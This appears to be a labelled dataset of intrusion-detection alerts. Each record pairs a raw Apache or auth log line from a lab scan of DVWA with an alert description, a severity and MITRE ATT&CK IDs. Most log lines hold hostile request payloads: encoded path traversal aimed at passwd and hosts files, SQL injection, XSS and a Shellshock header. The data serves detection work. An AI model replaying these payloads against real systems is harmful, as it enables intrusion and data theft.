192.168.204.1 - - [20/Oct/2023:23:28:07 +0500] "GET /DVWA/login.php?Login=Login&password=&user_token=8b200124ecd990a2056241cb3415035a&user_token=../../../../../../../windows&username= HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:58 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fboot%2eini%00index%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:46:45 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:40 +0500] "GET /tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?dupfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
syscheck
File '/boot/grub/x86_64-efi/loadbios.mod' modified Mode: scheduled Changed attributes: mtime,inode Old modification time was: '1696137074', now it is '1697479754' Old inode was: '1049263', now it is '1048984'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:23 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:31 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:00 +0500] "GET /cgi-bin/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cdiv%20id%3d%22105%22%3e%3ciframe%20src%3d%22data%3aimage%2fsvg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N%2e%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-%2a%D10%D4%B4%D1%87%E8%B2%03%22%3e%3c%2fiframe%3e%2f%2f[%22'%60--%3e]]%3e]%3c%2fdiv%3e%3cdiv%20id%3d%22106%22%3e%3cimg%20src%20onerror%20%2f%22%20'%22%3d%20alt%3dalert(106)%2f%2f%22%3e%2f%2f[%22'%60--%3e]]%3e]%3c%2fdiv%3e%3cdiv%20id%3d%22107%22%3e%3ctitle%20onpropertychange%3dalert(107)%3e%3c%2ftitle%3e%3ctitle%20title%3d%3e%3c%2ftitle%3e%2f%2f[%22'%60--%3e]]%3e]%3c%2fdiv%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%u2216%2e%2e%2e%2f%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:15 +0500] "GET /DVWA/login.php?Login=../../../../../../../../etc/passwd%00index.html&Login=Login&password=&user_token=8b200124ecd990a2056241cb3415035a&username= HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:52 +0500] "GET /DVWA/?user=jffnms_user_sql_injection.nasl'%20UNION%20SELECT%202%2c'admin'%2c'%241%24RxS1ROtX%24IzA1S3fcCfyVfA9rwKBMi.'%2c'Administrator'--&file=index&pass= HTTP/1.1" 302 522 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%%35%%63etc%%35%%63passwd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:07 +0500] "GET /ords/ HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:39 +0500] "GET /scripts/index.php?function=add_kom&no=<script>foo</script> HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:36 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e0x5c%2e%2e%2e%2f%2e0x5c%2e%2e%2e%2f%2e0x5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:34 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3c!--[if%3cimg%20src%3dx%20onerror%3dalert(2)%2f%2f]%3e%20--%3e%2f%2f[%22'%60--%3e]]%3e]%3c%2fdiv%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:21:03 +0500] "GET /DVWA/login.php?Login=/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:17 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2fhttps%3a%2f%2f%2fwww%2egoogle%2ecom%2f%2f%2e%2e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:17 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/auth.log
Oct 18 23:51:27 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:05 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2f%2f%2e%2e%2f%2f%2f%2e%2e%2f%2f%2f%2e%2e%2f%2f%2f%2e%2e%2f%2f%2f%2e%2e%2f%2f%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:43:48 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:27 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%c1%pc%5C%2e%2e%c1%pc%5C%2e%2e%c1%pc%5C%2e%2e%c1%pc%5C%2e%2e%c1%pcetc%c1%pcpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:16 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%uF025%2e%2e%01%uF025%2e%2e%01%uF025%2e%2e%01%uF025%2e%2e%01%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:28 +0500] "GET /bugport/php/index.php HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:36 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:07 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:08 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:50 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:26 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%5c%5C%2e%2e%5c%5C%2e%2e%5c%5C%2e%2e%5cetc%5cissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:48 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2fvar%2flog%2fnginx%2ferror_log%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%c0%qf%2e%2e%2e%2e%2f%c0%qf%2e%2e%2e%2e%2f%c0%qf%2e%2e%2e%2e%2f%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:58 +0500] "GET /cgi-bin/cal_event.php?id=1'%20UNION%20SELECT%201%2c2%2c'calendarix_id_sql_injection.nasl'%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/auth.log
Oct 18 23:51:06 sohaib-virtual-machine sudo: sohaib : TTY=pts/6 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "ZhwhOqzm"; readlink -e /usr/share/apport/testsuite/crash.jar 2>/dev/null; printf "command_done_%s" "HYxz9qpC"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:39 +0500] "GET /scripts/url.jsp?<script>foo</script> HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:57 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2f%2f%2e%2e%2f%2f%2e%2f%2f%2e%2e%2f%2f%2e%2f%2f%2e%2e%2f%2f%2e%2f%2f%2e%2e%2f%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/go-build2724593589/b010/_pkg_.a' modified Mode: realtime Changed attributes: size,mtime,md5,sha1,sha256 Size changed from '327509' to '347989' Old modification time was: '1703426815', now it is '1703426816' Old md5sum was: 'cea1862baadf93c76f3407038428f8a1' New md5sum is : '3801e58d6de10afb838e5235b3c0c5f2' Old sha1sum was: 'a2a1d20014e3b26daa4427da6b5940e8d98a0a2e' New sha1sum is : '1d7c222eaa339297ca9136bfd964b6683767f70e' Old sha256sum was: '2678b8af5e38c9a1d9d40d59c746c6bfa4e5c0240299ca073f22cfe77a3c8ac9' New sha256sum is : '709dc02906f041d0f884c6864cc010e6a182f1785e6af565668bf7a9c50c541e'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:00 +0500] "GET /cgi-bin/bugreport.cgi HTTP/1.1" 404 494 "-" "() { ignored; }; /bin/sleep 5;"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:14 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%252f%2e%2e%01%252f%2e%2e%01%252f%2e%2e%01%252f%2e%2e%01%252fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:15 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%c0%qf%2e%2e%01%c0%qf%2e%2e%01%c0%qfetc%c0%qfissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%25c1%259cetc%25c1%259cpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%c1%af%2e%2e%2e%2e%2f%c1%af%2e%2e%2e%2e%2f%c1%af%2e%2e%2e%2e%2f%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:51 +0500] "GET /cgi-bin/index.php?op=Default&Date=200607'%20UNION%20SELECT%201%2c590433596%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:02 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%c1%8s%2e%00%2e%c1%8s%2e%00%2e%c1%8s%2e%00%2e%c1%8s%2e%00%2e%c1%8s%2e%00%2e%c1%8setc%c1%8sissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:35 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%uF025%2e%2e%uF025boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:58 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%252f%2e%2e%252fboot%2eini%00index%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:35 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215passwd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%%35%%63%2e%2e%2e%2f%2e%%35%%63%2e%2e%2e%2f%2e%%35%%63etc%%35%%63issue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
